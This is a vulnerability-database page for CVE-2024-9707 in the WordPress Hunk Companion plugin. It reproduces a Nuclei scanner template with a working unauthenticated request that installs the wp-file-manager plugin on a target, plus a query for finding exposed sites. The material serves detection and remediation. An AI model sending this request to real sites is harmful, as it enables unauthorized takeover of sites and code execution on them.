| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Exploit for Missing Authorization in Themehunk Hunk_Companion | 11 Oct 202406:21 | – | githubexploit | |
| Exploit for Missing Authorization in Themehunk Hunk_Companion | 12 Jan 202523:35 | – | githubexploit | |
| CVE-2024-9707 | 11 Oct 202416:10 | – | circl | |
| WordPress plugin Hunk Companion 安全漏洞 | 11 Oct 202400:00 | – | cnnvd | |
| CVE-2024-9707 | 11 Oct 202406:50 | – | cve | |
| CVE-2024-9707 Hunk Companion <= 1.8.4 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation | 11 Oct 202406:50 | – | cvelist | |
| CVE-2024-9707 | 11 Oct 202413:15 | – | nvd | |
| WordPress Hunk Companion Plugin <= 1.8.4 is vulnerable to Broken Access Control | 10 Oct 202400:00 | – | patchstack | |
| WordPress Hunk Companion plugin <= 1.8.4 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation vulnerability | 10 Oct 202420:14 | – | patchstack | |
| PT-2024-39774 | 11 Oct 202400:00 | – | ptsecurity |
id: CVE-2024-9707
info:
name: Hunk Companion <= 1.8.4 - Arbitrary Plugin Installation
author: DhiyaneshDK
severity: critical
description: |
The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
impact: |
Unauthenticated attackers can install and activate arbitrary WordPress plugins, potentially achieving remote code execution if a vulnerable plugin is installed and activated on the target site.
remediation: |
Update Hunk Companion plugin to a version later than 1.8.4 that implements proper capability checks on the /wp-json/hc/v1/themehunk-import REST API endpoint.
reference:
- https://wordpress.org/plugins/hunk-companion/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve
- https://github.com/iSee857/CVE-PoC/blob/main/WordPress_Hunk_Companion(CVE-2024-9707).py
- https://github.com/RandomRobbieBF/CVE-2024-9707
- https://nvd.nist.gov/vuln/detail/CVE-2024-9707
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9707
cwe-id: CWE-862
epss-score: 0.09137
epss-percentile: 0.94672
cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: themehunk
product: hunk_companion
framework: wordpress
fofa-query: body="/wp-content/plugins/hunk-companion/"
tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev,vuln
http:
- raw:
- |
POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"params": {"templateType": "free", "plugin": {"wp-file-manager": "Wp File Manager"}, "allPlugins": [{"wp-file-manager": "wp-file-manager/wp-file-manager.php"}], "builder": "gogo", "themeSlug": "gogo", "proThemePlugin": "wp-file-manager", "tmplFreePro": "plugin", "wpUrl": "https://downloads.wordpress.org/", "thUrl": "https://themehunk.com/wp/data/"}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"\"https:\\\/\\\/'
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a0047304502205c441a0f77ddc83a797e6e60ef6386c66ef989ab56dbcdca46baea6dc4e1ecc0022100a6637635d50b8dc6c81c6f1e43c17c3b2234cf0a2be5e3be2f43db97533fa04f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation